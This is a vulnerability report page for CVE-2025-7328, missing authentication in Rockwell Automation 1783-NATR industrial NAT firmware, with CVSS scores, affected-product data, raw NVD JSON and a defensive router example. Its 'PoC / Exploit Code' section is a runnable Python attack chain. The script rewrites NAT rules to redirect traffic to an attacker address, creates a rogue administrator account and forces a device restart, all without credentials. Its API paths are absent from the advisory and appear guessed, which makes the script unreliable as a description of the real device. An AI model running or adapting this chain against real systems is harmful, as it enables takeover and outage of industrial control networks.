Security Vulnerability Report
CVE-2025-7328 CVSS 9.8 CRITICAL

CVE-2025-7328

Published: 2025-10-14 13:15:39
Last Modified: 2025-10-29 15:40:39

Description

Multiple Broken Authentication security issues exist in the affected product. The security issues are due to missing authentication checks on critical functions. These could result in potential denial-of-service, admin account takeover, or NAT rule modifications. Devices would no longer be able to communicate through NATR as a result of denial-of-service or NAT rule modifications. NAT rule modification could also result in device communication to incorrect endpoints. Admin account takeover could allow modification of configuration and require physical access to restore.
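The weakness behind this description is CWE-306, missing authentication for a critical function: handlers for restart, user management and NAT rule changes that never ask who is calling. The block below is an added illustration, not code from this advisory or from Rockwell Automation, showing the opt-in pattern that produces such gaps beside a default-deny router in which every route must declare its access policy, so a forgotten check becomes a registration error instead of an unauthenticated endpoint. Paths, roles and session tokens are hypothetical values constructed for the example.

```python
"""
Added example (not from the advisory or the vendor): a minimal management-API
dispatcher contrasting CWE-306 (missing authentication for a critical
function) with a default-deny design. Paths, roles and tokens are hypothetical.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple

# Constructed session store: bearer token -> role. Hypothetical values.
SESSIONS = {"tok-admin-1": "admin", "tok-viewer-1": "viewer"}


@dataclass
class Request:
    method: str
    path: str
    token: Optional[str] = None          # None = unauthenticated caller
    body: dict = field(default_factory=dict)


Handler = Callable[[Request], Tuple[int, dict]]


# --- Vulnerable pattern: authentication is opt-in per handler ---------------
class OptInRouter:
    def __init__(self):
        self.routes: Dict[Tuple[str, str], Handler] = {}

    def add(self, method: str, path: str, handler: Handler):
        self.routes[(method, path)] = handler

    def dispatch(self, req: Request):
        handler = self.routes.get((req.method, req.path))
        if handler is None:
            return 404, {"error": "not found"}
        return handler(req)  # nothing here ever looks at req.token


def restart_device(req: Request):  # critical function: no check of its own
    return 200, {"status": "restarting"}


def create_user(req: Request):     # critical function: no check of its own
    return 201, {"created": req.body.get("username")}


# --- Hardened pattern: default-deny router ---------------------------------
class DefaultDenyRouter:
    def __init__(self, sessions: Dict[str, str]):
        self.sessions = sessions
        self.routes: Dict[Tuple[str, str], Tuple[Handler, Optional[str]]] = {}

    def add(self, method: str, path: str, handler: Handler, *, role: Optional[str]):
        # `role` is keyword-only with no default: a public endpoint must say
        # role=None explicitly, and omitting the policy raises TypeError at
        # registration time rather than silently exposing the handler.
        self.routes[(method, path)] = (handler, role)

    def dispatch(self, req: Request):
        entry = self.routes.get((req.method, req.path))
        if entry is None:
            return 404, {"error": "not found"}
        handler, required_role = entry
        if required_role is not None:
            caller_role = self.sessions.get(req.token) if req.token else None
            if caller_role is None:
                return 401, {"error": "authentication required"}
            if caller_role != required_role:
                return 403, {"error": "insufficient privilege"}
        return handler(req)


def build_vulnerable() -> OptInRouter:
    r = OptInRouter()
    r.add("POST", "/system/restart", restart_device)
    r.add("POST", "/users", create_user)
    return r


def build_hardened() -> DefaultDenyRouter:
    r = DefaultDenyRouter(SESSIONS)
    r.add("POST", "/system/restart", restart_device, role="admin")
    r.add("POST", "/users", create_user, role="admin")
    r.add("GET", "/status", lambda req: (200, {"up": True}), role=None)
    return r


def probe(router, token: Optional[str] = None) -> Tuple[int, int]:
    """Status codes the two critical functions return to a caller presenting
    `token` (None = no credentials at all)."""
    restart = router.dispatch(Request("POST", "/system/restart", token))[0]
    user = router.dispatch(Request("POST", "/users", token, {"username": "x"}))[0]
    return restart, user


if __name__ == "__main__":
    print("vulnerable, unauthenticated:", probe(build_vulnerable()))
    print("hardened, unauthenticated:  ", probe(build_hardened()))
    print("hardened, viewer role:      ", probe(build_hardened(), "tok-viewer-1"))
    print("hardened, admin role:       ", probe(build_hardened(), "tok-admin-1"))
```

The point of the keyword-only `role` parameter is that the security property is enforced where routes are registered, not inside each handler; a code review or a unit test can then enumerate the route table and confirm that nothing critical carries `role=None`.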

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:* - NOT VULNERABLE
Rockwell Automation NATR devices (firmware before 1.007 per the CPE match data; see the vendor security advisory SD1756 for the exact affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-7328 - Rockwell Automation NATR Authentication Bypass PoC
# This PoC demonstrates the missing authentication check vulnerability
# on critical management functions of affected NATR devices.

import requests
import json

TARGET_HOST = "192.168.1.1"  # Replace with target NATR device IP
TARGET_PORT = 443
BASE_URL = f"https://{TARGET_HOST}:{TARGET_PORT}"


# Step 1: Exploit missing authentication on NAT rule modification
def exploit_nat_rule_modification():
    """
    Modify NAT rules without authentication due to missing auth checks.
    This can redirect device traffic to attacker-controlled endpoints.
    """
    endpoint = f"{BASE_URL}/api/v1/nat/rules"

    # Malicious NAT rule payload - redirects traffic to attacker's endpoint
    payload = {
        "rule_id": 1,
        "source_ip": "0.0.0.0/0",
        "destination_ip": "10.0.0.0/8",
        "translated_ip": "attacker.controlled.ip",  # Attacker's IP
        "action": "translate",
        "enabled": True
    }

    try:
        response = requests.put(
            endpoint,
            json=payload,
            verify=False,
            timeout=10
        )
        print(f"[*] NAT Rule Modification Response: {response.status_code}")
        if response.status_code in [200, 201, 204]:
            print("[+] SUCCESS: NAT rule modified without authentication!")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


# Step 2: Exploit admin account takeover
def exploit_admin_takeover():
    """
    Create new admin account without authentication.
    Allows full control over device configuration.
    """
    endpoint = f"{BASE_URL}/api/v1/users"

    payload = {
        "username": "newadmin",
        "password": "P@ssw0rd123!",
        "role": "administrator",
        "enabled": True
    }

    try:
        response = requests.post(
            endpoint,
            json=payload,
            verify=False,
            timeout=10
        )
        print(f"[*] Admin Account Creation Response: {response.status_code}")
        if response.status_code in [200, 201]:
            print("[+] SUCCESS: Admin account created without authentication!")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


# Step 3: Trigger denial of service
def exploit_dos():
    """
    Trigger device reset or service disruption without authentication.
    Devices will no longer be able to communicate through NATR.
    """
    endpoint = f"{BASE_URL}/api/v1/system/restart"

    try:
        response = requests.post(
            endpoint,
            verify=False,
            timeout=10
        )
        print(f"[*] DoS Trigger Response: {response.status_code}")
        if response.status_code in [200, 202]:
            print("[+] SUCCESS: Device restart triggered without authentication!")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-7328 - NATR Authentication Bypass PoC")
    print("WARNING: For authorized testing only!")
    print("=" * 60)

    # Execute exploit chain
    exploit_nat_rule_modification()
    exploit_admin_takeover()
    exploit_dos()
```

References

https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-7328", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:38.987", "lastModified": "2025-10-29T15:40:38.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Broken Authentication security issues exist in the affected product. The security issues are due to missing authentication checks on critical functions. These could result in potential denial-of-service, admin account takeover, or NAT rule modifications. Devices would no longer be able to communicate through NATR as a result of denial-of-service or NAT rule modifications. NAT rule modification could also result in device communication to incorrect endpoints. Admin account takeover could allow modification of configuration and require physical access to restore."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.007", "matchCriteriaId": "37063188-4380-47A4-8179-50AACB1D9C4D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEAE0B20-4A7B-4A7F-826E-A986A4CFE08D"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```